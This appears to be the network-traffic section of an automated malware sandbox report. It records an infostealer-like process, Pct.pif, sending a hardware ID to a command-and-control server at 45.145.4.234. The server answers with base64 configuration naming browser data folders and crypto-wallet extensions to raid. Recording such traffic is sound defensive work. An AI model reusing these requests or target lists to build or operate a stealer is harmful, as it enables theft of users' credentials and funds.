                                                                                                                                                Oct 6, 2024 22:18:57.717215061 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.717221022 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.717237949 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.717272997 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.717298985 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.800502062 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.800687075 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.800714016 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.800796986 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.800816059 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.800885916 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.801093102 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.801179886 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.801398993 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.801464081 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.801738024 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.801817894 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.801989079 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.802050114 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.802079916 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.802145004 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.802568913 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.802654982 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.802675009 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.802743912 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.802788973 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.802850008 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.803638935 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.803734064 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.803805113 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.803870916 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.803905010 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.803977966 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.804131031 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.804203987 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.804241896 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.804310083 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.887083054 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.887221098 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.887221098 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.887252092 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.887274027 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.887300014 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.887506008 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.887571096 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.887770891 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.887831926 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.888050079 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.888103008 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.888273001 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.888333082 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.888544083 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.888603926 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.888926983 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.888991117 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.889158010 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.889219999 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.889239073 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.889281988 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.889297009 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.889305115 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.889328957 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.889345884 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.889914989 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.889991045 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890047073 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890084982 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890108109 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890117884 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890130043 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890160084 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890490055 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890533924 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890547037 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890557051 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.890577078 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.890597105 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.974839926 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.974951982 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975020885 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.975081921 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.975085020 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975100994 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.975128889 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975147009 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975157976 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.975203991 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975210905 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:57.975254059 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975878954 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:57.975895882 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:58.273029089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:58.273332119 CEST6388780192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:58.278253078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:58.278268099 CEST806388745.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:58.278347969 CEST6388780192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:58.278525114 CEST6388780192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:58.283278942 CEST806388745.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:58.997692108 CEST806388745.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:58.997869015 CEST6388780192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:19:01.700748920 CEST6388780192.168.2.645.145.4.234

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 6, 2024 22:16:23.838246107 CEST5345053192.168.2.61.1.1.1
                                                                                                                                                Oct 6, 2024 22:16:23.847919941 CEST53534501.1.1.1192.168.2.6
                                                                                                                                                Oct 6, 2024 22:16:48.793076992 CEST5352738162.159.36.2192.168.2.6
                                                                                                                                                Oct 6, 2024 22:16:49.290637970 CEST5173653192.168.2.61.1.1.1
                                                                                                                                                Oct 6, 2024 22:16:49.299778938 CEST53517361.1.1.1192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.939624071 CEST5285253192.168.2.61.1.1.1
                                                                                                                                                Oct 6, 2024 22:18:52.560993910 CEST53528521.1.1.1192.168.2.6

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Oct 6, 2024 22:16:23.838246107 CEST192.168.2.61.1.1.10xdfaeStandard query (0)hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYWA (IP address)IN (0x0001)false
                                                                                                                                                Oct 6, 2024 22:16:49.290637970 CEST192.168.2.61.1.1.10x4dd7Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                Oct 6, 2024 22:18:51.939624071 CEST192.168.2.61.1.1.10x8daaStandard query (0)sst.myA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Oct 6, 2024 22:16:23.847919941 CEST1.1.1.1192.168.2.60xdfaeName error (3)hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYWnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 6, 2024 22:16:49.299778938 CEST1.1.1.1192.168.2.60x4dd7Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                Oct 6, 2024 22:18:52.560993910 CEST1.1.1.1192.168.2.60x8daaNo error (0)sst.my103.6.198.219A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • sst.my
                                                                                                                                                • 45.145.4.234

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.66388545.145.4.234806312C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Oct 6, 2024 22:18:39.780683994 CEST87OUTGET / HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:40.390141010 CEST203INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:40 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:40.396630049 CEST413OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJE
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 214
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 44 43 41 34 37 32 33 31 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="hwid"42DCA47231951117388365------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="build"default------AAKJEGCFBGDHJJJJJKJE--
                                                                                                                                                Oct 6, 2024 22:18:40.621853113 CEST407INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:40 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 180
                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 4e 6d 55 33 4d 54 4d 32 4f 47 51 32 4f 57 4d 32 4d 7a 6b 79 4f 44 45 35 4d 6a 46 69 4e 6a 51 32 4d 6d 55 79 5a 44 63 32 4e 7a 68 6b 4e 32 4e 6b 4d 57 55 78 59 6a 41 7a 4e 32 4e 68 4f 54 52 6a 4e 7a 64 6a 4e 6a 55 33 5a 54 4e 69 4d 6d 59 79 4e 6d 4d 78 4d 7a 6c 6a 5a 6d 55 78 4d 54 49 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 42 38 4d 58 77 78 66 44 42 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                Data Ascii: NmU3MTM2OGQ2OWM2MzkyODE5MjFiNjQ2MmUyZDc2NzhkN2NkMWUxYjAzN2NhOTRjNzdjNjU3ZTNiMmYyNmMxMzljZmUxMTI0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDB8MXwxfDB8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                Oct 6, 2024 22:18:40.624782085 CEST467OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGD
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 268
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="message"browsers------IJEHCGIJECFIECBFIDGD--
                                                                                                                                                Oct 6, 2024 22:18:40.805855989 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:40 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 1520
                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                Oct 6, 2024 22:18:40.805974960 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                Oct 6, 2024 22:18:40.807025909 CEST466OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDG
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 267
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"plugins------DAECAECFCAAEBFHIEHDG--
                                                                                                                                                Oct 6, 2024 22:18:40.986713886 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:40 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 7116
                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
